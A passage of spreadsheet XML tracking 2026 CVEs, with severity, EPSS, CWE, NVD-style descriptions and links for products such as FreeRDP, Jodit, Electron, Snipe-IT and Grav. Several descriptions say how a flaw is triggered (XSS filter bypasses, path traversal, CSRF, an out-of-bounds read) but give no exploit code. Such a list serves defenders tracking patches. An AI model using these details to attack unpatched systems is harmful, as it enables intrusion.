          <t>nebula-mesh is a self-hosted control plane for Slack Nebula mesh VPN. From version 0.3.0 to before version 0.5.0, the nebula-mgmt Web UI host-creation path ignores both the server-wide enrollment_token_ttl security setting and per-network network_config.enrollment_token_ttl overrides. API host creation and token-regeneration paths use the configured TTL resolver, but POST /ui/hosts hardcodes now.Add(24 * time.Hour) for newly minted agent enrollment tokens. In deployments that intentionally reduce enrollment-token lifetime, any authenticated operator who can create a host through the Web UI can still mint a bearer enrollment token valid for about 24 hours. This issue has been patched in version 0.5.0.</t>
        </is>
      </c>
      <c r="M4871" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55513</t>
        </is>
      </c>
    </row>
    <row r="4872">
      <c r="A4872" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4872" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55519</t>
        </is>
      </c>
      <c r="C4872" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4872" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4872" s="5" t="inlineStr"/>
      <c r="F4872" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4872" s="5" t="inlineStr"/>
      <c r="H4872" s="5" t="inlineStr"/>
      <c r="I4872" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J4872" s="5" t="inlineStr"/>
      <c r="K4872" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="L4872" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT is an IT asset/license management system. Prior to 8.4.1, an authenticated user with generic asset edit permission can delete files attached to assets outside the user's ownership or company assignment. The destroy() methods in app/Http/Controllers/Api/UploadedFilesController.php and app/Http/Controllers/UploadedFilesController.php authorize update against the object class instead of the resolved object instance, creating an insecure direct object reference. This issue is fixed in version 8.4.1.</t>
        </is>
      </c>
      <c r="M4872" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55519</t>
        </is>
      </c>
    </row>
    <row r="4873">
      <c r="A4873" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4873" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55564</t>
        </is>
      </c>
      <c r="C4873" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4873" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4873" s="5" t="inlineStr"/>
      <c r="F4873" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4873" s="5" t="inlineStr"/>
      <c r="H4873" s="5" t="inlineStr"/>
      <c r="I4873" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J4873" s="5" t="inlineStr"/>
      <c r="K4873" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-193</t>
        </is>
      </c>
      <c r="L4873" s="5" t="inlineStr">
        <is>
          <t>FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.27.0, the glyph_cache_get function in libfreerdp/cache/glyph.c checks whether index is greater than cache-&gt;number instead of greater than or equal to it. A malicious RDP server can use GLYPH_FRAGMENT_USE replay in update_process_glyph_fragments to make the default cache receive index 254 when cache-&gt;number is 254, reading one pointer beyond the entries array and dereferencing it as a glyph. This can crash the client and may disclose adjacent heap data. This issue is fixed in version 3.27.0.</t>
        </is>
      </c>
      <c r="M4873" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55564</t>
        </is>
      </c>
    </row>
    <row r="4874">
      <c r="A4874" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4874" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55779</t>
        </is>
      </c>
      <c r="C4874" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4874" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4874" s="5" t="inlineStr"/>
      <c r="F4874" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4874" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4874" s="5" t="inlineStr"/>
      <c r="I4874" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J4874" s="5" t="inlineStr"/>
      <c r="K4874" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4874" s="5" t="inlineStr">
        <is>
          <t>Silverstripe Versioned provides versioning for Silverstripe models. Prior to 3.2.1, RestoreAction::getRestoreMessage() in src/RestoreAction.php builds ArchiveAdmin restore notifications rendered as CAST_HTML and inserts $restoredItem-&gt;Title, $restoredItem-&gt;URLSegment, $restoredItem-&gt;CMSEditLink(), and $changedProperty['value'] without applying Convert::raw2xml(). When an administrator restores an archived page containing a crafted title or URL segment, the generated restoration message can execute stored JavaScript in the administrator's browser, compromising the confidentiality and integrity of the CMS session. This issue is fixed in version 3.2.1.</t>
        </is>
      </c>
      <c r="M4874" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55779</t>
        </is>
      </c>
    </row>
    <row r="4875">
      <c r="A4875" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4875" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62324</t>
        </is>
      </c>
      <c r="C4875" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4875" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4875" s="5" t="inlineStr"/>
      <c r="F4875" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4875" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4875" s="5" t="inlineStr"/>
      <c r="I4875" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J4875" s="5" t="inlineStr"/>
      <c r="K4875" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-83</t>
        </is>
      </c>
      <c r="L4875" s="5" t="inlineStr">
        <is>
          <t>Jodit Editor is a WYSIWYG editor with a built-in file browser &amp; image editor. Prior to 4.12.31, Jodit's sanitizeHTMLElement method fails to use isDangerousUrl to normalize javascript: href values before checking the scheme, allowing case variants, control-byte prefixes, and embedded tabs or newlines to bypass filtering and execute attacker-controlled script when a victim clicks a stored link rendered by an application. This issue is fixed in version 4.12.31.</t>
        </is>
      </c>
      <c r="M4875" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62324</t>
        </is>
      </c>
    </row>
    <row r="4876">
      <c r="A4876" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4876" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62671</t>
        </is>
      </c>
      <c r="C4876" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4876" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4876" s="5" t="inlineStr"/>
      <c r="F4876" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4876" s="5" t="inlineStr"/>
      <c r="H4876" s="5" t="inlineStr"/>
      <c r="I4876" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J4876" s="5" t="inlineStr"/>
      <c r="K4876" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L4876" s="5" t="inlineStr">
        <is>
          <t>Grav Login Plugin adds login, basic ACL, and session wide messages to Grav. Prior to 3.8.11, the Grav Login plugin login.regenerate2FASecret task accepts a top-level GET request through the TaskServiceProvider task: URI parameter without requiring a login-form nonce, an Origin check, or a Referer check. Under the default SameSite=Lax session cookie policy, an off-site navigation can invoke taskRegenerate2FASecret() in a logged-in victim's session, overwrite the victim's TOTP secret, and force two-factor re-enrollment. This issue is fixed in version 3.8.11.</t>
        </is>
      </c>
      <c r="M4876" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62671</t>
        </is>
      </c>
    </row>
    <row r="4877">
      <c r="A4877" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4877" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63134</t>
        </is>
      </c>
      <c r="C4877" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4877" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4877" s="5" t="inlineStr"/>
      <c r="F4877" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4877" s="5" t="inlineStr"/>
      <c r="H4877" s="5" t="inlineStr"/>
      <c r="I4877" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J4877" s="5" t="inlineStr"/>
      <c r="K4877" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L4877" s="5" t="inlineStr">
        <is>
          <t>Malcolm is a network traffic analysis tool suite. Prior to version 26.07.0, `safe-extract.py` protects file extraction with libarchive's secure flags, but creates directory entries with a raw `os.makedirs(os.path.join(dest, entry.pathname))` that has no traversal protection. An uploaded malicious archive containing a directory entry with a `../` sequence or an absolute path causes the filebeat processing container to create directories outside the intended extraction directory. Version 26.07.0 fixes the issue.</t>
        </is>
      </c>
      <c r="M4877" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63134</t>
        </is>
      </c>
    </row>
    <row r="4878">
      <c r="A4878" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4878" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67990</t>
        </is>
      </c>
      <c r="C4878" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4878" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4878" s="5" t="inlineStr"/>
      <c r="F4878" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4878" s="5" t="inlineStr"/>
      <c r="H4878" s="5" t="inlineStr"/>
      <c r="I4878" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J4878" s="5" t="inlineStr"/>
      <c r="K4878" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L4878" s="5" t="inlineStr">
        <is>
          <t>basecamp/upright at commit efe4f2e5254ac6e57e45d2261804cca74dbbca3f disables Rails CSRF protection for its Alertmanager and Prometheus proxy controllers. An unauthenticated attacker can induce a logged-in user's browser to submit requests that are forwarded to enabled upstream write or management endpoints, such as creating an Alertmanager silence or requesting a Prometheus reload. The final impact depends on the APIs enabled by the upstream services.</t>
        </is>
      </c>
      <c r="M4878" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67990</t>
        </is>
      </c>
    </row>
    <row r="4879">
      <c r="A4879" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4879" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69402</t>
        </is>
      </c>
      <c r="C4879" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4879" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4879" s="5" t="inlineStr"/>
      <c r="F4879" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4879" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H4879" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="I4879" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4879" s="5" t="inlineStr"/>
      <c r="K4879" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4879" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="M4879" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69402</t>
        </is>
      </c>
    </row>
    <row r="4880">
      <c r="A4880" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4880" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69417</t>
        </is>
      </c>
      <c r="C4880" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4880" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4880" s="5" t="inlineStr"/>
      <c r="F4880" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4880" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H4880" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="I4880" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4880" s="5" t="inlineStr"/>
      <c r="K4880" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4880" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="M4880" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69417</t>
        </is>
      </c>
    </row>
    <row r="4881">
      <c r="A4881" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4881" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69690</t>
        </is>
      </c>
      <c r="C4881" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4881" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4881" s="5" t="inlineStr"/>
      <c r="F4881" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4881" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H4881" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="I4881" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4881" s="5" t="inlineStr"/>
      <c r="K4881" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4881" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="M4881" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69690</t>
        </is>
      </c>
    </row>
    <row r="4882">
      <c r="A4882" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4882" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70481</t>
        </is>
      </c>
      <c r="C4882" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4882" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4882" s="5" t="inlineStr"/>
      <c r="F4882" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4882" s="5" t="inlineStr"/>
      <c r="H4882" s="5" t="inlineStr"/>
      <c r="I4882" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J4882" s="5" t="inlineStr"/>
      <c r="K4882" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-862</t>
        </is>
      </c>
      <c r="L4882" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.5.0 until 0.11.0, the standard channel message update and delete handlers accepted any caller holding write access on the channel without checking that the caller wrote the message. Because write access is the same grant a member needs to post, any ordinary participant in a shared standard channel could rewrite or permanently delete another participant message, while group and direct message handlers enforced authorship. This issue is fixed in 0.11.0.</t>
        </is>
      </c>
      <c r="M4882" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70481</t>
        </is>
      </c>
    </row>
    <row r="4883">
      <c r="A4883" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4883" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70610</t>
        </is>
      </c>
      <c r="C4883" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4883" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4883" s="5" t="inlineStr"/>
      <c r="F4883" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G4883" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4883" s="5" t="inlineStr"/>
      <c r="I4883" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J4883" s="5" t="inlineStr"/>
      <c r="K4883" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="L4883" s="5" t="inlineStr">
        <is>
          <t>Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to 39.8.9, 40.9.2, 41.2.2, and 42.0.0-beta.4, objects copied across the contextBridge boundary from untrusted content could carry an attacker-influenced prototype, enabling prototype-pollution-style attacks against preload code despite context isolation being enabled. Apps are only affected if their preload code accepts object arguments from untrusted content and reads properties from them without own-property checks, while apps that only accept primitive arguments or validate object arguments are not affected. This issue is fixed in 39.8.9, 40.9.2, 41.2.2, and 42.0.0-beta.4.</t>
        </is>
      </c>
      <c r="M4883" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70610</t>
        </is>
      </c>
    </row>
    <row r="4884">
      <c r="A4884" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4884" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70612</t>
        </is>
      </c>
      <c r="C4884" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4884" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4884" s="5" t="inlineStr"/>
      <c r="F4884" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G4884" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4884" s="5" t="inlineStr"/>
      <c r="I4884" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J4884" s="5" t="inlineStr"/>
      <c r="K4884" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L4884" s="5" t="inlineStr">
        <is>
          <t>Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to 39.8.8, 40.9.0, 41.2.1, and 42.0.0-beta.3, requests to open external protocol URLs from web content did not take iframe sandbox restrictions into account, so a sandboxed iframe could cause an OS-registered external application to be launched. The frame sandbox state was also not made available to the app permission handlers, affecting apps that render untrusted content in sandboxed iframes and grant the openExternal permission by default when no setPermissionRequestHandler is installed. This issue is fixed in 39.8.8, 40.9.0, 41.2.1, and 42.0.0-beta.3.</t>
        </is>
      </c>
      <c r="M4884" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70612</t>
        </is>
      </c>
    </row>
    <row r="4885">
      <c r="A4885" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4885" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71356</t>
        </is>
      </c>
      <c r="C4885" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4885" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4885" s="5" t="inlineStr"/>
      <c r="F4885" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4885" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4885" s="5" t="inlineStr"/>
      <c r="I4885" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4885" s="5" t="inlineStr"/>
      <c r="K4885" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L488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885" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71356</t>
        </is>
      </c>
    </row>
    <row r="4886">
      <c r="A4886" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4886" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71357</t>
        </is>
      </c>
      <c r="C4886" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4886" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4886" s="5" t="inlineStr"/>
      <c r="F4886" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4886" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4886" s="5" t="inlineStr"/>
      <c r="I4886" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4886" s="5" t="inlineStr"/>
      <c r="K4886" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L488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886" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71357</t>
        </is>
      </c>
    </row>
    <row r="4887">
      <c r="A4887" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4887" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71388</t>
        </is>
      </c>
      <c r="C4887" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4887" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4887" s="5" t="inlineStr"/>
      <c r="F4887" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4887" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4887" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4887" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4887" s="5" t="inlineStr"/>
      <c r="K4887" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L488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887" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71388</t>
        </is>
      </c>
    </row>
    <row r="4888">
      <c r="A4888" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4888" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71440</t>
        </is>
      </c>
      <c r="C4888" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4888" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4888" s="5" t="inlineStr"/>
      <c r="F4888" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4888" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4888" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4888" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4888" s="5" t="inlineStr"/>
      <c r="K4888" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L488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88" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71440</t>
        </is>
      </c>
    </row>
    <row r="4889">
      <c r="A4889" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4889" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71565</t>
        </is>
      </c>
      <c r="C4889" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4889" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4889" s="5" t="inlineStr"/>
      <c r="F4889" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4889" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4889" s="5" t="inlineStr"/>
      <c r="I4889" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4889" s="5" t="inlineStr"/>
      <c r="K4889" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L488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889" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71565</t>
        </is>
      </c>
    </row>
    <row r="4890">
      <c r="A4890" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4890" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71803</t>
        </is>
      </c>
      <c r="C4890" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4890" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4890" s="5" t="inlineStr"/>
      <c r="F4890" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4890" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4890" s="5" t="inlineStr"/>
      <c r="I4890" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4890" s="5" t="inlineStr"/>
      <c r="K4890" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4890" s="5" t="inlineStr">
        <is>
          <t>money-pos 1.0 contains a stored Cross-Site Scripting (XSS) vulnerability. When processing returns, the backend fails to filter or escape the goodsName parameter, directly concatenating it into the order log description; the frontend subsequently renders this content using v-html. An attacker with product creation privileges can inject a malicious JavaScript payload, causing unauthorized code execution when an administrator views the order logs.</t>
        </is>
      </c>
      <c r="M4890" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71803</t>
        </is>
      </c>
    </row>
    <row r="4891">
      <c r="A4891" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4891" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71858</t>
        </is>
      </c>
      <c r="C4891" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4891" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4891" s="5" t="inlineStr"/>
      <c r="F4891" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4891" s="5" t="inlineStr"/>
      <c r="H4891" s="5" t="inlineStr"/>
      <c r="I4891" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J4891" s="5" t="inlineStr"/>
      <c r="K4891" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-693, CWE-78</t>
        </is>
      </c>
      <c r="L4891" s="5" t="inlineStr">
        <is>
          <t>Notepad++ is a free and open-source source code editor. Prior to 8.9.7, macros loaded from an attacker-controlled shortcuts.xml bypass the HMAC validation applied to UserDefinedCommands and can invoke Scintilla actions and the internal Open in Default Viewer command in an elevated Notepad++ process, allowing protected file modification and conditional elevated command execution when a local attacker influences settingsDir and a user triggers the macro. This issue is fixed in version 8.9.7.</t>
        </is>
      </c>
      <c r="M4891" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71858</t>
        </is>
      </c>
    </row>
    <row r="4892">
      <c r="A4892" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4892" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72626</t>
        </is>
      </c>
      <c r="C4892" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4892" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4892" s="5" t="inlineStr"/>
      <c r="F4892" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4892" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4892" s="5" t="inlineStr"/>
      <c r="I4892" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4892" s="5" t="inlineStr"/>
      <c r="K4892" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L489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892" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72626</t>
        </is>
      </c>
    </row>
    <row r="4893">
      <c r="A4893" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4893" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72627</t>
        </is>
      </c>
      <c r="C4893" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4893" s="5" t="inlineStr">
        <is>
